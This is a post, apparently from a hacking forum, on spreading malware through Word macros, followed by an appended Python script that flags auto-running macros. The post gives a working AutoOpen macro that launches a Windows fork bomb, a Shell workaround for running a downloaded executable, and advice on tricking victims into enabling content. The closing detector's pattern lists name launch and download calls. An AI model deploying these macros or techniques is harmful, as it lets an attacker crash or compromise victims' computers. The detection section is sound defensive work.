
Locked Exploits of .doc – MS Word Documents


dEEpEst


Microsoft Office Word documents have “macro” functionality, which is implemented in the Visual Basic for Applications (VBA) programming language. VBA is nearly the same as Visual Basic; the main difference is that VB compiles to an executable, while VBA needs a document as a carrier.

In my previous article, I analyzed .svg images as a way of spreading malware. SVG images use embedded JavaScript, which runs in a browser and is therefore subject to some restrictions. VBA, on the other hand, runs as an executable and thus has more permissions.

Some social engineering is needed to get the victim to click ‘Enable Content’, but I don’t think that’s difficult. That button loads and starts the scripts; clicking it is enough for malware to get installed. A very common social engineering trick is to use Microsoft’s generic prompt: enable macros to view content.

Visual Basic is a powerful programming language; I’ve seen Remote Administrator Tools written in Visual Basic. However, adding such malware to a document would greatly increase its size. Detaching from the document carrier is also preferable because of some restrictions. Therefore, downloaders are more suitable for hackers. Additionally, changing the payload is possible because that is done on the server side.

 


Simple pranks for demonstration

This is how you view and record macros: open a document -> View -> Macros.


If we choose to record a macro, we have the option to assign it to a button or to the keyboard.


But we’re going to choose the AutoOpen() option, so we don’t need that: our script can execute as soon as macros are enabled. For example, this script opens a calculator upon opening the document. It will ask for permission (Enable Content) only the first time it executes:

 


It will stop when the document is closed, but we can detach from the document. This script creates and starts forkbomb.bat, a Windows batch script that executes some terminal commands. Forkbomb.bat starts 2 copies of itself. Both of those do the same thing, resulting in exponential growth which completely depletes computer resources:

Sub AutoOpen()
    Shell("cmd.exe /S /K" & "echo %0^|%0 > forkbomb.bat")
    Shell("cmd.exe /S /K" & "forkbomb.bat")
End Sub


This leaves the computer unusable; a forced restart is necessary to kill it. Something like this is expected:


You can extend the script to make it run when the PC is started, to clog the PC once again. Safe boot would be the solution then.

VBA download and execute file upon opening

Thanks to malmoe for his share – A short VBA macro to download and execute a file.


The simple script downloads and executes a file just by enabling content on a document.

Malmoe used Shell("file.exe"), which causes a permission error on my Windows 10 MS Word 2010. However, if I use this workaround from my fork bomb

Shell("cmd.exe /S /K" & "file.exe")


…downloaded program executes normally.

Conclusion

Word macros are slightly restricted Visual Basic executables. With some sneakiness, they can be used to compromise a system by downloading and executing a ‘real’ .exe – macros are as dangerous as executables!
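
From the defender's side, the two traits this post relies on (a procedure that runs on open, and a call that launches or downloads a program) can be checked in macro source before a document reaches a user. The following triage sketch is an added example, not code from the original post; it assumes the VBA text has already been extracted from the document by other tooling, and its indicator lists and sample macros are constructed and not exhaustive.

```python
import re

# Procedures Word runs by itself once macros are enabled for the document.
AUTO_EXEC = re.compile(
    r"^\s*(?:(?:Private|Public)\s+)?Sub\s+"
    r"(Auto(?:Open|Exec|Close|New|Exit)|Document_(?:Open|Close|New))\b",
    re.I | re.M)
# Process-launch and download primitives (assumed, non-exhaustive lists).
LAUNCH = re.compile(r"WScript\.Shell|\bShell\b|cmd\.exe|powershell", re.I)
DOWNLOAD = re.compile(
    r"URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream", re.I)

def normalize(vba):
    """Undo layout that would hide a keyword from a plain pattern match."""
    vba = re.sub(r"[ \t]+_\r?\n", " ", vba)   # join " _" line continuations
    vba = re.sub(r'"\s*&\s*"', "", vba)       # fold "a" & "b" into "ab"
    # Drop full-line comments so commented-out code is not reported.
    return "\n".join(line for line in vba.splitlines()
                     if not line.lstrip().startswith("'"))

def triage(vba):
    """Return matched indicators and a verdict: block, review or clean."""
    src = normalize(vba)
    found = {
        "auto_exec": sorted({m.group(1) for m in AUTO_EXEC.finditer(src)}),
        "launch": sorted({m.group(0).lower() for m in LAUNCH.finditer(src)}),
        "download": sorted({m.group(0).lower() for m in DOWNLOAD.finditer(src)}),
    }
    risky = found["launch"] or found["download"]
    if found["auto_exec"] and risky:
        found["verdict"] = "block"    # runs on open AND starts or fetches a program
    elif risky:
        found["verdict"] = "review"   # needs a user action, still worth a look
    else:
        found["verdict"] = "clean"
    return found

# Constructed samples (not taken from a real document).
SAMPLE_AUTORUN = '''Sub AutoOpen()
    ' constructed sample using the same Shell wrapper shape as the post
    Shell ("cmd.exe /S /K" & _
           "file.exe")
End Sub
'''
SAMPLE_BENIGN = '''Sub FormatHeading()
    ' Shell("calc.exe") is only mentioned in this comment
    Selection.Font.Bold = True
End Sub
'''
```

A "block" verdict here is a reason to quarantine the document for analysis; a "clean" verdict only means none of the listed strings appeared in the extracted text.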
